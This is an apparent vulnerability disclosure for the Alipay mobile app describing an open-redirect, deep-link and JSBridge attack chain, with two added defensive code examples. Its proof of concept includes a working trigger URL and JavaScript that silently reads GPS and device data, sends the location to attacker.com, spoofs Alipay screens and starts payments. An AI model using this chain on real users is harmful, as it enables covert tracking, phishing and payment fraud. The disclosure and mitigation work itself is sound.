# Alipay Mobile App - DeepLink+JSBridge Unauthorized API Access Chain

# CVE Pending (MITRE Ticket #2005801)

# 6 Vulnerabilities, CVSS 7.4–9.3

## Advisory Information

- Title: Alipay DeepLink+JSBridge Attack Chain — Silent GPS Exfiltration & Unauthorized API Access
- Researcher: Jiqiang Feng (Innora AI Security Research)
- Vendor: Ant Group / Alibaba Group
- Product: Alipay (支付宝) v10.8.30.x (Android & iOS)
- Users Affected: 1 billion+
- Risk: Critical (CVSS 9.3)
- CVE: 6 IDs pending (MITRE Ticket #2005801)
- Vendor Response: "Normal functionality" — refused to patch
- Disclosure Timeline: Responsible disclosure Feb 25 → Public Mar 11, 2026

## Summary

A single crafted URL enables a complete attack chain against Alipay mobile app users: crafted link → open redirect via a trusted domain (ds.alipay.com) → Alipay deep link handler → attacker page loads in the privileged WebView → JSBridge APIs silently exfiltrate GPS and device data and can initiate payment flows. None of this requires user consent or produces a visible prompt.

## Vulnerability Details

### Vuln 1: Open Redirect Whitelist Bypass (CWE-601 + CWE-939, CVSS 9.3)

ds.alipay.com accepts a `scheme` parameter and redirects to the arbitrary `alipays://` URL it contains. Because ds.alipay.com itself is on the client's whitelist, the link passes the Alipay client's URL validation even though the final destination is attacker-controlled.

Attack URL:

https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=[ATTACKER_URL]

### Vuln 2: Silent GPS Exfiltration (CWE-359, CVSS 7.4)

`AlipayJSBridge.call('getLocation')` returns GPS coordinates (8.8 m accuracy) silently: no user prompt, no consent dialog, and the call completes in 7 seconds.

### Vuln 3: Unauthorized Payment Initiation (CWE-940, CVSS 8.6) [iOS only]

`AlipayJSBridge.call('tradePay')` can pre-fill and present payment screens. Combined with the "small amount password-free payment" feature, this may enable zero-interaction payment.
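The whitelist-bypass logic of Vuln 1, as an added example that is not part of the advisory and not the Alipay client's code. It models a client that trusts a link because its host is ds.alipay.com, then shows the check that should replace it: follow the `scheme` parameter into the `alipays://` deep link, pull out the nested `url`, and require that final origin to be allowlisted. The allowed-origin list (`https://h5.example`) and the helper names are assumptions; the PoC URL is the one from the advisory. Because the inner `&` in that URL is not percent-encoded, a standard query parser would split the deep link in two, so the example takes everything after `scheme=` as the redirect target, which is the only reading under which the PoC URL works as described.

```javascript
// Added example, not from the advisory. Models the Vuln 1 chain: a client
// that allowlists the outer host (ds.alipay.com) lets the PoC URL through,
// while a check that resolves the nested alipays:// target does not.
// The allowed-origin list and the helper names are assumptions.

// PoC trigger URL exactly as given in the advisory.
const POC_URL =
  'https://ds.alipay.com/?scheme=alipays://platformapi/startapp' +
  '?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html';

// Outer hosts the client trusts to redirect it (on the page: ds.alipay.com).
const TRUSTED_REDIRECT_HOSTS = new Set(['ds.alipay.com']);

// Origins that may be loaded in the privileged WebView. Placeholder value:
// a real deployment would list only the vendor's own H5 origins.
const ALLOWED_WEBVIEW_ORIGINS = new Set(['https://h5.example']);

// The weak check: trusts the link because its host is allowlisted, without
// looking at where the redirect leads.
function naiveAllowlistCheck(href) {
  return TRUSTED_REDIRECT_HOSTS.has(new URL(href).hostname);
}

// Raw value of the `scheme` parameter. The inner `&` in the PoC URL is not
// percent-encoded, so the redirector evidently forwards the remainder of the
// query as one string; this reproduces that behaviour (assumption).
function extractSchemeTarget(href) {
  const query = new URL(href).search.slice(1);
  const marker = 'scheme=';
  const at = query.indexOf(marker);
  if (at === -1) return null;
  return query.slice(at + marker.length);
}

// Follow the chain: outer link -> alipays://platformapi/startapp?url=... ->
// the external page the WebView would load.
// Returns { target: URL|null, error: string|null }.
function resolveDeepLink(href) {
  const raw = extractSchemeTarget(href);
  if (raw === null) return { target: null, error: null };
  let deepLink;
  try { deepLink = new URL(raw); } catch (e) { return { target: null, error: 'unparseable scheme' }; }
  if (deepLink.protocol !== 'alipays:') return { target: null, error: 'unexpected scheme' };
  // getAll() so that a second, hidden `url` parameter cannot slip past a
  // check that only looked at the first one.
  const urls = deepLink.searchParams.getAll('url'); // values are percent-decoded
  if (urls.length === 0) return { target: null, error: null };
  if (urls.length > 1) return { target: null, error: 'ambiguous url parameter' };
  try { return { target: new URL(urls[0]), error: null }; } catch (e) {
    return { target: null, error: 'unparseable nested url' };
  }
}

// The hardened check: trust in the outer host is not enough; the origin
// that ends up inside the WebView must itself be allowlisted and be https.
function hardenedCheck(href, allowedOrigins = ALLOWED_WEBVIEW_ORIGINS) {
  if (!naiveAllowlistCheck(href)) {
    return { allowed: false, reason: 'outer host not trusted', destination: null };
  }
  const { target, error } = resolveDeepLink(href);
  if (error !== null) return { allowed: false, reason: error, destination: null };
  if (target === null) {
    // No nested page to load, so nothing external reaches the WebView.
    return { allowed: true, reason: 'no nested url', destination: null };
  }
  if (target.protocol !== 'https:' || !allowedOrigins.has(target.origin)) {
    return { allowed: false, reason: 'nested origin not allowlisted', destination: target.href };
  }
  return { allowed: true, reason: 'nested origin allowlisted', destination: target.href };
}

// Usage: the naive check passes the PoC URL, the hardened one stops it.
console.log(naiveAllowlistCheck(POC_URL));  // true
console.log(hardenedCheck(POC_URL));        // allowed: false, destination innora.ai
```

The point of `resolveDeepLink` is that the decision is made on the page the WebView will actually render, not on the first hop. A client that can resolve the chain like this can also log `destination` for every rejected link, which is the signal a SOC would want for the SMS/QR distribution described in the PoC.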
### Vuln 4: UI Spoofing (CWE-451, CVSS 8.1)

`AlipayJSBridge.call('showToast')` and `AlipayJSBridge.call('setTitle')` let an attacker page display fake system notifications and change the WebView title bar, so the page can present itself as an Alipay screen.

### Vuln 5: Device Fingerprinting (CWE-200, CVSS 8.6)

`AlipayJSBridge.call('getSystemInfo')`, `getNetworkType`, `getCameraPermission` and `getMicrophonePermission` expose the device model, OS version, carrier and the camera/microphone permission state.

### Vuln 6: DeepLink URL Scheme Handler Bypass (CWE-939, CVSS 9.1)

The `alipays://` scheme handler loads external URLs in the privileged WebView context without proper origin validation, granting the loaded page full JSBridge API access.

## Exploitable JSBridge APIs (Verified)

| API            | Data Extracted                    | Android | iOS |
|----------------|-----------------------------------|---------|-----|
| getLocation    | GPS coords (8.8 m accuracy)       | Yes     | Yes |
| getNetworkType | WiFi/cellular, carrier info       | Yes     | Yes |
| getSystemInfo  | Device model, OS, screen          | Yes     | Yes |
| tradePay       | Pre-fill payment screen           | No      | Yes |
| share          | Trigger share dialog              | No      | Yes |
| scan           | Activate QR scanner               | No      | Yes |
| chooseImage    | Access photo picker               | No      | Yes |
| setTitle       | Modify WebView title (UI spoof)   | Yes     | Yes |
| showToast      | Fake system notifications         | Yes     | Yes |

## Proof of Concept

### Step 1: Trigger URL (distribute via SMS/email/QR)

https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html

### Step 2: JSBridge exploitation code (runs inside the Alipay WebView)

```javascript
// Wait for the in-app bridge to become available
document.addEventListener('AlipayJSBridgeReady', function () {
  // Silent GPS exfiltration: no prompt is shown to the user
  AlipayJSBridge.call('getLocation', {}, function (result) {
    // result.latitude, result.longitude (8.8m accuracy), result.city
    // Exfiltrate to attacker server
    fetch('https://attacker.com/collect', {
      method: 'POST',
      body: JSON.stringify({
        lat: result.latitude,
        lng: result.longitude,
        city: result.city
      })
    });
  });

  // Device fingerprinting
  AlipayJSBridge.call('getSystemInfo', {}, function (info) {
    // info.brand, info.model, info.system, info.version
  });

  // UI spoofing: retitle the WebView and show a fake system toast
  AlipayJSBridge.call('setTitle', { title: 'Alipay Security Center' });
  AlipayJSBridge.call('showToast', { content: 'Verification successful' });

  // iOS only: payment initiation
  AlipayJSBridge.call('tradePay', { tradeNO: 'ATTACKER_ORDER' });
});
```

## Verification Evidence

- 3 test devices: Samsung S25 Ultra (NZ), Xiaomi Redmi 12 (MY), iPhone 16 Pro (CN)
- 308 server-side GPS exfiltration logs with real coordinates
- 42 verification screenshots
- Vendor's security lead tested on an iPhone from Hangzhou (Alipay HQ): GPS captured silently in 7 s
- iOS exposes 5 additional critical APIs compared with Android

## Disclosure Timeline

- 2026-02-25 Initial TLS/SSL report to vendor
- 2026-03-06 Vendor: "cannot be practically exploited"
- 2026-03-07 Expanded report: 17 vulns with full end-to-end proof
- 2026-03-07 Whitelist bypass achieved in 2 minutes during a live call with the vendor's security lead
- 2026-03-08 Vendor security lead's own iPhone tested: GPS captured
- 2026-03-10 Vendor final response: "normal functionality"
- 2026-03-11 Public disclosure
- 2026-03-11 Vendor's law firm files takedown complaint (4 hours after publication)
- 2026-03-12 6 CVEs submitted to MITRE CNA-LR (Ticket #2005801)

## References

- Technical Report: https://innora.ai/zfb/
- PoC Demo Page: https://innora.ai/zfb/poc/trigger.html
- Rebuttal to Legal Complaint: https://innora.ai/zfb/rebuttal.html

## Credits

Jiqiang Feng — Innora AI Security Research
feng@innora.ai | https://innora.ai
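The two controls the advisory says are absent, the origin check on the page calling the bridge (Vuln 6) and a consent prompt before `getLocation` (Vuln 2) or `tradePay` (Vuln 3), as an added reference design. This is not Alipay's code and says nothing about how its bridge is built; the trusted-origin list, the grant model, the native stubs and their constructed return values are all assumptions. The dispatcher replays the exact call sequence from the Step 2 PoC as if the PoC page were the WebView's current page, and every call is refused; a trusted page still needs a user grant for location and payment.

```javascript
// Added example, not Alipay's code. A reference JSBridge dispatcher that
// binds the API surface to the origin of the page the WebView is showing and
// requires an explicit user grant before location or payment calls succeed.
// Origins, native stubs and the consent model are assumptions.

// Origins allowed to use the bridge at all. Placeholder: a real list would
// hold only the vendor's own H5 origins, never an arbitrary redirect target.
const TRUSTED_ORIGINS = new Set(['https://h5.example']);

// Calls that must also be backed by a user grant (the prompt the advisory
// reports as missing), keyed by the grant they need.
const CONSENT_REQUIRED = { getLocation: 'location', tradePay: 'payment' };

// Stand-ins for the native handlers, returning constructed data with the
// field names the PoC reads. Coordinates and device strings are made up.
const NATIVE_HANDLERS = {
  getLocation: () => ({ latitude: 30.2741, longitude: 120.1551, city: 'Hangzhou', accuracy: 8.8 }),
  getSystemInfo: () => ({ brand: 'Example', model: 'Example-1', system: 'Android', version: '10.8.30' }),
  getNetworkType: () => ({ networkType: 'WIFI' }),
  setTitle: (p) => ({ title: p.title }),
  showToast: (p) => ({ shown: p.content }),
  tradePay: (p) => ({ tradeNO: p.tradeNO, resultCode: '9000' }),
};

// `pageOrigin` must be supplied by the native side from the WebView's
// current URL, never taken from the page's own arguments, or the check is
// trivially spoofed. `grants` holds the consent kinds the user has approved.
function createBridge(trustedOrigins, grants) {
  return {
    call(pageOrigin, api, params = {}) {
      const handler = NATIVE_HANDLERS[api];
      if (!handler) return { ok: false, error: 'unknown api: ' + api };
      if (!trustedOrigins.has(pageOrigin)) {
        return { ok: false, error: 'origin not trusted: ' + pageOrigin };
      }
      const grant = CONSENT_REQUIRED[api];
      if (grant && !grants.has(grant)) {
        return { ok: false, error: 'user grant required: ' + grant };
      }
      return { ok: true, result: handler(params) };
    },
  };
}

// The call sequence from the advisory's Step 2 PoC page.
const POC_CALLS = [
  ['getLocation', {}],
  ['getSystemInfo', {}],
  ['setTitle', { title: 'Alipay Security Center' }],
  ['showToast', { content: 'Verification successful' }],
  ['tradePay', { tradeNO: 'ATTACKER_ORDER' }],
];

// Replay the PoC calls as if `pageOrigin` were the WebView's current page
// and count how many the gate lets through.
function replayPoc(bridge, pageOrigin) {
  const outcome = { allowed: 0, denied: 0, errors: [] };
  for (const [api, params] of POC_CALLS) {
    const r = bridge.call(pageOrigin, api, params);
    if (r.ok) outcome.allowed += 1;
    else { outcome.denied += 1; outcome.errors.push(api + ': ' + r.error); }
  }
  return outcome;
}

// Usage: the PoC origin gets nothing; a trusted page still needs grants.
const noGrants = createBridge(TRUSTED_ORIGINS, new Set());
console.log(replayPoc(noGrants, 'https://innora.ai'));    // allowed 0, denied 5
console.log(replayPoc(noGrants, 'https://h5.example'));   // allowed 3, denied 2
const withLocation = createBridge(TRUSTED_ORIGINS, new Set(['location']));
console.log(withLocation.call('https://h5.example', 'getLocation').ok); // true
```

Two design points follow from the advisory's table. First, the origin decision is made per call, not once at page load, so a trusted page that navigates to an attacker URL inside the same WebView loses access on the next call. Second, UI primitives such as `setTitle` and `showToast` are gated on origin like everything else, which is what stops the fake "Alipay Security Center" screen from Vuln 4 even on pages that never touch location or payment.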